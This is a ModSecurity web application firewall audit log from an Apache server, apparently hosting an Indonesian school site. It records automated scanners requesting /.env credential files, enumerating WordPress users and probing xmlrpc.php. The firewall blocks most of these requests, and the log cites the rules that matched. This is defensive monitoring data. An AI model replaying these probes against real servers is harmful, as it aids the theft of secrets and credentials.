Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e37a16-Z-- --b20ce512-A-- [30/Apr/2025:13:49:02 +0700] aBHH3j1td-6YjlnYDRLKwgAAAAk 103.236.140.4 52562 103.236.140.4 8181 --b20ce512-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 Accept-Charset: utf-8 --b20ce512-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b20ce512-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995742635493 794 (- - -) Stopwatch2: 1745995742635493 794; combined=341, p1=297, p2=0, p3=0, p4=0, p5=44, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b20ce512-Z-- --e80f0276-A-- [30/Apr/2025:13:50:51 +0700] aBHIS9mPDA_SdVd56wA4FgAAANE 103.236.140.4 52982 103.236.140.4 8181 --e80f0276-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3866.0 Safari/537.36 Accept-Charset: utf-8 --e80f0276-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e80f0276-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745995851855529 867 (- - -) Stopwatch2: 1745995851855529 867; combined=386, p1=330, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e80f0276-Z-- --2b9f3222-A-- [30/Apr/2025:14:33:32 +0700] aBHSTNmPDA_SdVd56wA60wAAANU 103.236.140.4 34840 103.236.140.4 8181 --2b9f3222-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.144.212.193 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.144.212.193 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --2b9f3222-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b9f3222-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745998412444353 817 (- - -) Stopwatch2: 1745998412444353 817; combined=324, p1=284, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b9f3222-Z-- --e5a9f70f-A-- [30/Apr/2025:15:08:30 +0700] aBHaftBN0baiHx4WjiaiGwAAAEI 103.236.140.4 43178 103.236.140.4 8181 --e5a9f70f-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 165.22.34.189 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 165.22.34.189 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --e5a9f70f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e5a9f70f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746000510965561 815 (- - -) Stopwatch2: 1746000510965561 815; combined=363, p1=325, p2=0, p3=0, p4=0, p5=38, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5a9f70f-Z-- --6b846466-A-- [30/Apr/2025:15:26:31 +0700] aBHet9mPDA_SdVd56wA96wAAAMY 103.236.140.4 47446 103.236.140.4 8181 --6b846466-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 Accept-Charset: utf-8 --6b846466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6b846466-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746001591815325 781 (- - -) Stopwatch2: 1746001591815325 781; combined=317, p1=278, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6b846466-Z-- --d956cc6a-A-- [30/Apr/2025:16:09:35 +0700] aBHoz9mPDA_SdVd56wBAywAAAMw 103.236.140.4 57498 103.236.140.4 8181 --d956cc6a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.87.47 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.87.47 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --d956cc6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d956cc6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746004175665608 769 (- - -) Stopwatch2: 1746004175665608 769; combined=354, p1=317, p2=0, p3=0, p4=0, p5=36, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d956cc6a-Z-- --0fd6d660-A-- [30/Apr/2025:16:50:03 +0700] aBHyS9BN0baiHx4Wjiam8gAAAEc 103.236.140.4 38782 103.236.140.4 8181 --0fd6d660-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --0fd6d660-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fd6d660-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746006603508402 769 (- - -) Stopwatch2: 1746006603508402 769; combined=319, p1=281, p2=0, p3=0, p4=0, p5=38, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fd6d660-Z-- --b4a1ce5a-A-- [30/Apr/2025:16:50:26 +0700] aBHyYj1td-6YjlnYDRLXWQAAAAE 103.236.140.4 38872 103.236.140.4 8181 --b4a1ce5a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b4a1ce5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4a1ce5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746006626156452 738 (- - -) Stopwatch2: 1746006626156452 738; combined=325, p1=293, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4a1ce5a-Z-- --d11b4c06-A-- [30/Apr/2025:17:19:18 +0700] aBH5JtBN0baiHx4WjiaosQAAAFc 103.236.140.4 45602 103.236.140.4 8181 --d11b4c06-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d11b4c06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d11b4c06-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746008358770909 831 (- - -) Stopwatch2: 1746008358770909 831; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d11b4c06-Z-- --f25aa07c-A-- [30/Apr/2025:17:20:05 +0700] aBH5VTsHLQ2TK6eM3eqFswAAAI0 103.236.140.4 45810 103.236.140.4 8181 --f25aa07c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.211 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.211 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f25aa07c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25aa07c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746008405318868 791 (- - -) Stopwatch2: 1746008405318868 791; combined=320, p1=280, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25aa07c-Z-- --f20f4423-A-- [30/Apr/2025:18:12:05 +0700] aBIFhdmPDA_SdVd56wBHMwAAAMw 103.236.140.4 58196 103.236.140.4 8181 --f20f4423-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 207.154.212.47 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 207.154.212.47 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f20f4423-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f20f4423-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746011525320655 754 (- - -) Stopwatch2: 1746011525320655 754; combined=321, p1=283, p2=0, p3=0, p4=0, p5=38, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f20f4423-Z-- --c649c62d-A-- [30/Apr/2025:18:23:03 +0700] aBIIF9mPDA_SdVd56wBIPwAAAMY 103.236.140.4 60788 103.236.140.4 8181 --c649c62d-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 164.90.208.56 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 164.90.208.56 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c649c62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c649c62d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746012183392164 816 (- - -) Stopwatch2: 1746012183392164 816; combined=302, p1=265, p2=0, p3=0, p4=0, p5=37, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c649c62d-Z-- --837a5663-A-- [30/Apr/2025:19:31:08 +0700] aBIYDNBN0baiHx4Wjia0uAAAAFM 103.236.140.4 58584 103.236.140.4 8181 --837a5663-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 159.65.18.197 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 159.65.18.197 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --837a5663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --837a5663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016268298955 718 (- - -) Stopwatch2: 1746016268298955 718; combined=296, p1=255, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --837a5663-Z-- --c2737049-A-- [30/Apr/2025:19:35:54 +0700] aBIZKj1td-6YjlnYDRLnAQAAABg 103.236.140.4 45722 103.236.140.4 8181 --c2737049-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.227 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c2737049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2737049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746016554826075 2683 (- - -) Stopwatch2: 1746016554826075 2683; combined=1256, p1=406, p2=824, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2737049-Z-- --4208db7f-A-- [30/Apr/2025:19:36:10 +0700] aBIZOtBN0baiHx4Wjia4YQAAAEo 103.236.140.4 46542 103.236.140.4 8181 --4208db7f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.227 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.227 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4208db7f-C-- demo.sayHello --4208db7f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4208db7f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746016570357093 5822 (- - -) Stopwatch2: 1746016570357093 5822; combined=4364, p1=646, p2=3511, p3=26, p4=30, p5=86, sr=111, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4208db7f-Z-- --7a82c55e-A-- [30/Apr/2025:19:39:21 +0700] aBIZ-T1td-6YjlnYDRLqQwAAAAk 103.236.140.4 56922 103.236.140.4 8181 --7a82c55e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 --7a82c55e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a82c55e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016761004368 689 (- - -) Stopwatch2: 1746016761004368 689; combined=275, p1=233, p2=0, p3=0, p4=0, p5=42, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a82c55e-Z-- --8977db35-A-- [30/Apr/2025:19:39:35 +0700] aBIaBz1td-6YjlnYDRLqlQAAABg 103.236.140.4 57784 103.236.140.4 8181 --8977db35-B-- GET /test/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 78.153.140.224 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 78.153.140.224 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E) --8977db35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8977db35-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746016775716861 778 (- - -) Stopwatch2: 1746016775716861 778; combined=351, p1=314, p2=0, p3=0, p4=0, p5=37, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8977db35-Z-- --42947178-A-- [30/Apr/2025:20:10:19 +0700] aBIhO9BN0baiHx4WjibT1QAAAEo 103.236.140.4 44320 103.236.140.4 8181 --42947178-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.244.132 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.244.132 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --42947178-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --42947178-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746018619743276 793 (- - -) Stopwatch2: 1746018619743276 793; combined=292, p1=253, p2=0, p3=0, p4=0, p5=39, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --42947178-Z-- --e7f43768-A-- [30/Apr/2025:20:13:29 +0700] aBIh-dmPDA_SdVd56wBzwQAAANg 103.236.140.4 54620 103.236.140.4 8181 --e7f43768-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 147.182.149.75 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 147.182.149.75 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --e7f43768-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7f43768-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746018809974968 726 (- - -) Stopwatch2: 1746018809974968 726; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7f43768-Z-- --16838239-A-- [30/Apr/2025:20:28:25 +0700] aBIledmPDA_SdVd56wB_4wAAANY 103.236.140.4 46560 103.236.140.4 8181 --16838239-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.34 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.2; U; de-DE) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/234.40.1 Safari/534.6 TouchPad/1.0 Accept-Charset: utf-8 --16838239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16838239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] 